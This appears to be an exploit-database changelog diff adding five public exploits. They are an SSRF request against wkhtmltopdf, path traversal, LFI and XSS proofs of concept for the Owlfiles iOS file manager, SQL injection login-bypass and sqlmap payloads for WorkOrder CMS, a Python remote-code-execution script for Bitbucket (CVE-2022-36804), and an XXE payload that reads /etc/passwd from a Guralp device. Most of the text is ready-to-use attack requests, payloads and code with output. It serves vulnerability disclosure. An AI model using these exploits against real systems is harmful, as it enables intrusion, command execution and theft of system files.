DB: 2023-03-24

6 changes to exploits/shellcodes/ghdb

wkhtmltopdf 0.12.6 -  Server Side Request Forgery

Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities

WorkOrder CMS 0.1.0 - SQL Injection

Bitbucket v7.0.0 -  RCE

MAN-EAM-0003 V3.2.4 - XXE

exploits/asp/webapps/51039.txt

@@ -0,0 +1,26 @@
+# Exploit Title: wkhtmltopdf 0.12.6 -  Server Side Request Forgery
+# Date: 20/8/2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: https://wkhtmltopdf.org
+# Software Link: https://wkhtmltopdf.org/downloads.html
+# Version: 0.12.6
+# Tested on: Windows ASP.NET <http://asp.net/>
+
+POST /PDF/FromHTML HTTP/1.1
+Host: vulnerable.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: <length>
+Dnt: 1
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+
+__RequestVerificationToken=Token&header=<PDFstructure+>....&data= <PDFstructure+>....<iframe+src=“http://10.10.10.1”>

exploits/ios/webapps/51036.txt

@@ -0,0 +1,128 @@
+# Exploit Title: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities
+# Date: Sep 19, 2022
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://www.skyjos.com/
+# Software Link:
+https://apps.apple.com/us/app/owlfiles-file-manager/id510282524
+# Version: 12.0.1
+# Tested on: iPhone iOS 16.0
+
+
+
+###########
+path traversal on HTTP built-in server
+###########
+
+GET /../../../../../../../../../../../../../../../System/ HTTP/1.1
+Host: localhost:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
+AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
+Safari/8536.25
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+If-None-Match: 42638202/1663558201/177889085
+If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT
+Connection: close
+Content-Length: 0
+
+-------
+HTTP/1.1 200 OK
+Cache-Control: max-age=3600, public
+Content-Length: 317
+Content-Type: text/html; charset=utf-8
+Connection: Close
+Server: GCDWebUploader
+Date: Mon, 19 Sep 2022 05:01:11 GMT
+
+<!DOCTYPE html>
+<html><head><meta charset="utf-8"></head><body>
+<ul>
+<li><a href="Cryptexes/">Cryptexes/</a></li>
+<li><a href="DriverKit/">DriverKit/</a></li>
+<li><a href="Library/">Library/</a></li>
+<li><a href="Applications/">Applications/</a></li>
+<li><a href="Developer/">Developer/</a></li>
+</ul>
+</body></html>
+
+
+#############
+LFI on HTTP built-in server
+#############
+
+GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
+Host: localhost:8080
+Accept: application/json, text/javascript, */*; q=0.01
+User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
+AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
+Safari/8536.25
+X-Requested-With: XMLHttpRequest
+Referer: http://localhost:8080/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+
+----
+
+HTTP/1.1 200 OK
+Connection: Close
+Server: GCDWebUploader
+Content-Type: application/octet-stream
+Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT
+Date: Mon, 19 Sep 2022 03:28:14 GMT
+Content-Length: 213
+Cache-Control: max-age=3600, public
+Etag: 1152921500312187994/1662169021/0
+
+##
+# Host Database
+#
+# localhost is used to configure the loopback interface
+# when the system is booting.  Do not change this entry.
+##
+127.0.0.1 localhost
+255.255.255.255 broadcasthost
+::1             localhost
+
+
+
+###############
+path traversal on FTP built-in server
+###############
+
+ftp> cd ../../../../../../../../../
+250 OK. Current directory is /../../../../../../../../../
+ftp> ls
+200 PORT command successful.
+150 Accepted data connection
+total 10
+drwxr-xr-x     0 root wheel        256 Jan 01 1970 usr
+drwxr-xr-x     0 root wheel        128 Jan 01 1970 bin
+drwxr-xr-x     0 root wheel        608 Jan 01 1970 sbin
+drwxr-xr-x     0 root wheel        224 Jan 01 1970 System
+drwxr-xr-x     0 root wheel        640 Jan 01 1970 Library
+drwxr-xr-x     0 root wheel        224 Jan 01 1970 private
+drwxr-xr-x     0 root wheel       1131 Jan 01 1970 dev
+drwxr-xr-x     0 root admin       4512 Jan 01 1970 Applications
+drwxr-xr-x     0 root admin         64 Jan 01 1970 Developer
+drwxr-xr-x     0 root admin         64 Jan 01 1970 cores
+WARNING! 10 bare linefeeds received in ASCII mode
+File may not have transferred correctly.
+226 Transfer complete.
+ftp>
+
+#############
+XSS on HTTP built-in server
+#############
+
+poc 1:
+
+http://localhost:8080/download?path=<script>alert(1)</script>
+
+poc 2:
+
+http://localhost:8080/list?path=<script>alert(1)</script>

exploits/php/webapps/51038.txt

@@ -0,0 +1,75 @@
+# Exploit Title: WorkOrder CMS 0.1.0 - SQL Injection
+# Date: Sep 22, 2022
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS
+# Software Link: https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip
+# Version: 0.1.0
+# Tested on: Linux
+
+# Auth Bypass:
+
+
+username:' or '1'='1
+
+password:' or '1'='1
+
+
+#sqlmap -r workorder.req --threads=10 --level 5 --risk 3 --dbs --dbms=mysql
+
+
+# POST Requests:
+
+
+Parameter: #1* ((custom) POST)
+
+    Type: error-based
+
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+
+    Payload: userName=1'='1&password=1/' AND (SELECT 3761 FROM(SELECT
+COUNT(*),CONCAT(0x7170627071,(SELECT
+(ELT(3761=3761,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UUhY!1111'/
+
+
+    Type: stacked queries
+
+    Title: MySQL >= 5.0.12 stacked queries (comment)
+
+    Payload: userName=1'='1&password=1/';SELECT SLEEP(5)#!1111'/
+
+
+    Type: time-based blind
+
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+    Payload: userName=1'='1&password=1/' AND (SELECT 6822 FROM
+(SELECT(SLEEP(5)))lYsh)-- YlDI!1111'/
+
+
+Parameter: #2* ((custom) POST)
+
+    Type: error-based
+
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+
+    Payload: userName=1'='1&password=1/!1111' AND (SELECT 2010 FROM(SELECT
+COUNT(*),CONCAT(0x7170627071,(SELECT
+(ELT(2010=2010,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tqtn/
+
+
+    Type: stacked queries
+
+    Title: MySQL >= 5.0.12 stacked queries (comment)
+
+    Payload: userName=1'='1&password=1/!1111';SELECT SLEEP(5)#/
+
+
+    Type: time-based blind
+
+    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
+
+    Payload: userName=1'='1&password=1/!1111' OR SLEEP(5)-- XuTW/

exploits/python/webapps/51040.txt

@@ -0,0 +1,66 @@
+# Exploit Title: Bitbucket v7.0.0 -  RCE
+# Date: 09-23-2022
+# Exploit Author: khal4n1
+# Vendor Homepage: https://github.com/khal4n1
+# Tested on: Kali and ubuntu LTS 22.04
+# CVE : cve-2022-36804
+
+#****************************************************************#
+#The following exploit is used to exploit a vulnerability present
+#Atlassian Bitbucket Server and Data Center 7.0.0 before version
+#7.6.17, from version 7.7.0 before version 7.17.10, from version
+#7.18.0 before version 7.21.4, from version 8.0.0 before version
+#8.0.3, from version 8.1.0 before version 8.1.3, and from version
+#8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1
+
+#Usage Example
+
+# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'
+
+# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'
+
+#The server will send a 500 http response with the stout output from the
+# command  executed.
+
+
+#****************************************************************#
+
+#!/usr/bin/python3
+
+import argparse
+import urllib
+from urllib import request
+import re
+
+#argument setup
+parser = argparse.ArgumentParser(description='Program to test
+bitbucket vulnerability CVE-2022-36804')
+parser.add_argument("--url", help="Set the target to attack.
+[REQUIRED]", required=True )
+parser.add_argument("--cmd", help="Set the command to execute.
+[DEFAULT ID]", required=True, default='id')
+args = parser.parse_args()
+cmd= urllib.parse.quote(args.cmd)
+
+
+#reads from the public repository what is available
+requ = request.urlopen(args.url+ "/repos?visibility=public")
+response = requ.read()
+
+#select a public project and stores it in a variable
+project = re.findall('7990/projects/(.*)/repos/',
+str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]
+
+#Selects a public repo and stores it in a vatiable
+file = re.findall('/repos/(.*)/browse',
+str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]
+
+# Exploitation
+try :
+        attack = request.urlopen(args.url +
+"/rest/api/latest/projects/" + project + "/repos/" + file +
+"/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin")
+        print (attack.response())
+except urllib.error.HTTPError as e:
+        body = e.read().decode()  # Read the body of the error response
+        print (body)

exploits/xml/webapps/51037.txt

@@ -0,0 +1,644 @@
+# Exploit Title: MAN-EAM-0003 V3.2.4 - XXE
+# Date: 2022-09-19
+# Exploit Author: Ahmed Alroky
+# Author: http://guralp.com/
+# Version: 3.2.4
+# Authentication Required: NO
+# CVE :   CVE-2022-38840
+# Google dork: " webconfig menu.cgi "
+# Tested on: Windows
+
+
+# Exploit
+
+1 - browse to http://<Host<http://%3cHost> name>/cgi-bin/xmlstatus.cgi
+2 - click on "View saved XML snapshot" and upload XML exploit file or paste the exploit code and submit the form
+3 - you will get /etc/passwd file content
+
+#XML exploit code
+
+```
+<?xml version='1.0'?>
+<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd"> ]>
+<xml-status xmlns='http://www.guralp.com/platinum/xmlns/xmlstatus/1.1'>
+<module status='-1' display-primary='true' path='das' title='Data acquisition'>
+<reading status='100' display-primary='false' path='is_faulty'
+    title='Fault condition'>false</reading>
+<reading status='-1' display-primary='false' path='dsp_tag'
+    title='DSP code tag'>platinum</reading>
+<reading status='-1' display-primary='false' path='dsp_version'
+    title='DSP code version'>102</reading>
+<reading status='100' display-primary='true' path='dsp_state'
+    title='Acquisition hardware module'>running</reading>
+<reading status='-1' display-primary='true' path='reference_clock'
+    title='Reference clock type'>GPS</reading>
+<reading status='100' display-primary='false' path='clock_controller'
+    title='ADC clock controller state'>FLL</reading>
+<reading status='-1' display-primary='false' path='clock_control_val'
+    title='ADC clock controller value'>46196</reading>
+<reading status='100' display-primary='true' path='clock_locked'
+    title='ADC clock locked'>true</reading>
+<reading status='-1' display-primary='true' path='clock_last_locked'
+    title='ADC clock last locked at'>2022-06-14T11:26:53Z</reading>
+<reading status='100' display-primary='true' path='clock_phase_error' units='s'
+    title='ADC clock phase error'>6.1e-08</reading>
+</module>
+<module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.0' title='Sensor A'>
+<reading status='100' display-primary='true' path='state'
+    title='Current state'>running</reading>
+<reading status='-1' display-primary='true' path='last_action_time'
+    title='Last action timestamp'>never</reading>
+<reading status='-1' display-primary='true' path='last_action'
+    title='Last action'></reading>
+<reading status='96' display-primary='true' path='mass_Z'
+    title='Z mass position'>4.6%</reading>
+<reading status='100' display-primary='true' path='mass_N'
+    title='N mass position'>-0.3%</reading>
+<reading status='100' display-primary='true' path='mass_E'
+    title='E mass position'>-0.3%</reading>
+</module>
+<module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.1' title='Sensor B'>
+<reading status='100' display-primary='true' path='state'
+    title='Current state'>running</reading>
+<reading status='-1' display-primary='true' path='last_action_time'
+    title='Last action timestamp'>never</reading>
+<reading status='-1' display-primary='true' path='last_action'
+    title='Last action'></reading>
+</module>
+<module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.X' title='Auxiliary'>
+<reading status='100' display-primary='true' path='state'
+    title='Current state'>running</reading>
+<reading status='-1' display-primary='true' path='last_action_time'
+    title='Last action timestamp'>never</reading>
+<reading status='-1' display-primary='true' path='last_action'
+    title='Last action'></reading>
+</module>
+<module status='-1' display-primary='true' path='gcf-out-scream.default' title='Scream server (GCF network sender)'>
+<reading status='100' display-primary='true' path='total_blocks'
+    title='Total number of blocks sent'>11374055</reading>
+<reading status='100' display-primary='true' path='last5_blocks'
+    title='Number of blocks sent in last 5 minutes'>331</reading>
+<reading status='-1' display-primary='false' path='port_number'
+    title='Port listening on'>1567</reading>
+<reading status='-1' display-primary='true' path='num_clients'
+    title='Number of clients connected'>0</reading>
+<list status='-1' display-primary='true' path='clients' title='Clients'>
+</list>
+</module>
+<module status='-1' display-primary='false' path='gdi-base.default' title='Default data transport daemon'>
+<reading status='100' display-primary='true' path='num_channels'
+    title='Number of channels'>16</reading>
+<reading status='100' display-primary='true' path='num_clients'
+    title='Number of connected clients'>5</reading>
+<reading status='100' display-primary='true' path='num_samples'
+    title='Number of samples received'>7338920142</reading>
+<reading status='100' display-primary='true' path='last5_samples'
+    title='Number of samples in last 5 minutes'>213600</reading>
+<list status='-1' display-primary='false' path='clients' title='Clients'>
+<list-item status='-1' display-primary='false' path='44B02216' title='Client #1'>
+<reading status='-1' display-primary='false' path='name'
+    title='Client name'>gdi2gcf[default]</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='1CC104A5' title='Client #2'>
+<reading status='-1' display-primary='false' path='name'
+    title='Client name'>gdi-link-tx[default]</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='9D9E4553' title='Client #3'>
+<reading status='-1' display-primary='false' path='name'
+    title='Client name'>gdi2miniseed[default]</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='4B1427EC' title='Client #4'>
+<reading status='-1' display-primary='false' path='name'
+    title='Client name'>das-in</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='412FD3EB' title='Client #5'>
+<reading status='-1' display-primary='false' path='name'
+    title='Client name'>das-in-textstatus</reading>
+</list-item>
+</list>
+<list status='-1' display-primary='false' path='channels' title='Channels'>
+<list-item status='-1' display-primary='false' path='38B5E770' title='Channel #1'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB.HHZ.TM.00</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='7B77F21B' title='Channel #2'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB.HHN.TM.00</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='B55019F4' title='Channel #3'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB.HHE.TM.00</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='35ED217B' title='Channel #4'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB.HDF.TM.X0</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='8062D6AB' title='Channel #5'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB.HNZ.TM.10</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='2099C9F1' title='Channel #6'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB.HNN.TM.10</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='DE833721' title='Channel #7'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB.HNE.TM.10</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='5510ED44' title='Channel #8'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB.MMZ.TM.00</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='ACFA260E' title='Channel #9'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB.MMN.TM.00</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='5BED382E' title='Channel #10'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB.MME.TM.00</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='67453FF7' title='Channel #11'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB.SOH.TM.0</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='1D34DF0D' title='Channel #12'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB-AIB</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='A11AEDBA' title='Channel #13'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB.SOH.TM.1</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='2DBCFF6E' title='Channel #14'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB-BIB</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path='9D7CDB17' title='Channel #15'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB.SOH.TM.X</reading>
+</list-item>
+<list-item status='-1' display-primary='false' path=' 8A3C070' title='Channel #16'>
+<reading status='-1' display-primary='false' path='name'
+    title='Channel name'>DONB-XIB</reading>
+</list-item>
+</list>
+</module>
+<module status='-1' display-primary='true' path='gdi-link-tx.default' title='System gdi-link transmitter'>
+<reading status='100' display-primary='true' path='total_bytes_sent' units='bytes'
+    title='Total number of bytes sent'>11273973132</reading>
+<reading status='100' display-primary='true' path='last5_bytes_sent'
+    title='Number of bytes sent in last 5 minutes'>325518</reading>
+<reading status='100' display-primary='true' path='tx_rate'
+    title='Transmit rate over last 5 minutes'>1085.06</reading>
+<reading status='-1' display-primary='false' path='port_number'
+    title='Port listening on'>1565</reading>
+<reading status='100' display-primary='true' path='num_clients'
+    title='Number of clients'>0</reading>
+<list status='-1' display-primary='true' path='clients' title='Clients'>
+</list>
+</module>
+<module status='-1' display-primary='true' path='gdi2gcf.default' title='GCF compressor. Default instance'>
+<reading status='100' display-primary='true' path='num_samples_in'
+    title='Total number of samples in'>7439096490</reading>
+<reading status='100' display-primary='true' path='last5_samples_in'
+    title='Number of samples in in last 5 minutes'>216516</reading>
+<reading status='100' display-primary='true' path='num_blocks_out'
+    title='Total number of blocks out'>11374055</reading>
+<reading status='100' display-primary='true' path='last5_blocks_out'
+    title='Number of blocks out in last 5 minutes'>331</reading>
+<list status='-1' display-primary='false' path='channels' title='Channels'>
+<list-item status='-1' display-primary='true' path='10D33176' title='DONB.HHZ.TM.00'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>100</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-AZ0</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'>2022-06-14T11:26:46.000000000Z</reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'>1</reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='39355EAD' title='DONB.HHN.TM.00'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>100</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-AN0</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'>2022-06-14T11:26:46.000000000Z</reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'>1</reading>
+</list-item>
+<list-item status='-1' display-primary='true' path=' 380425E' title='DONB.HHE.TM.00'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>100</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-AE0</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'>2022-06-14T11:26:45.000000000Z</reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'>1</reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='E6EAF8A3' title='DONB.HDF.TM.X0'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>100</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-XX0</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'>2022-06-14T11:26:35.000000000Z</reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'>1</reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='45B1141C' title='DONB.HNZ.TM.10'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>100</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-BZ0</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'>2022-06-14T11:26:48.000000000Z</reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'>1</reading>
+</list-item>
+<list-item status='-1' display-primary='true' path=' 9951403' title='DONB.HNN.TM.10'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>100</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-BN0</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'>2022-06-14T11:26:42.000000000Z</reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'>1</reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='3B38B4CE' title='DONB.HNE.TM.10'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>100</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-BE0</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'>2022-06-14T11:26:40.000000000Z</reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'>1</reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='3E12CA7F' title='DONB.MMZ.TM.00'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>4</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-AM8</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'>2022-06-14T11:24:48.000000000Z</reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'></reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='F194038D' title='DONB.MMN.TM.00'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>4</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-AM9</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'>2022-06-14T11:23:47.000000000Z</reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'></reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='80F951F3' title='DONB.MME.TM.00'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>4</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-AMA</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'>2022-06-14T11:23:57.000000000Z</reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'></reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='  DCFFBA' title='DONB.SOH.TM.0'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>nan</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-A00</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'></reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'></reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='F2D860DE' title='DONB-AIB'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>nan</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-AIB</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'></reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'></reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='8B4D513B' title='DONB.SOH.TM.1'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>nan</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-B00</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'></reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'></reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='5CC9B084' title='DONB-BIB'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>nan</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-BIB</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'></reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'></reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='B4418B8A' title='DONB.SOH.TM.X'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>nan</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-X00</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'></reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'></reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='AB7AFF68' title='DONB-XIB'>
+<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
+    title='Sample rate'>nan</reading>
+<reading status='-1' display-primary='true' path='gcf_name'
+    title='GCF name'>DONB-XIB</reading>
+<reading status='-1' display-primary='true' path='last_block'
+    title='Last block timestamp'></reading>
+<reading status='-1' display-primary='false' path='digitiser_type'
+    title='GCF digitiser type'>CMG-DAS</reading>
+<reading status='-1' display-primary='false' path='ttl'
+    title='GCF tap table lookup'>0</reading>
+<reading status='-1' display-primary='false' path='pga'
+    title='GCF variable gain'></reading>
+</list-item>
+</list>
+</module>
+<module status='-1' display-primary='true' path='gdi2miniseed.default' title='Mini-SEED compressor. Default instance'>
+<reading status='100' display-primary='true' path='num_samples_in'
+    title='Total number of data samples in'>6184483152</reading>
+<reading status='100' display-primary='true' path='last5_samples_in'
+    title='Number of samples in last 5 minutes'>180000</reading>
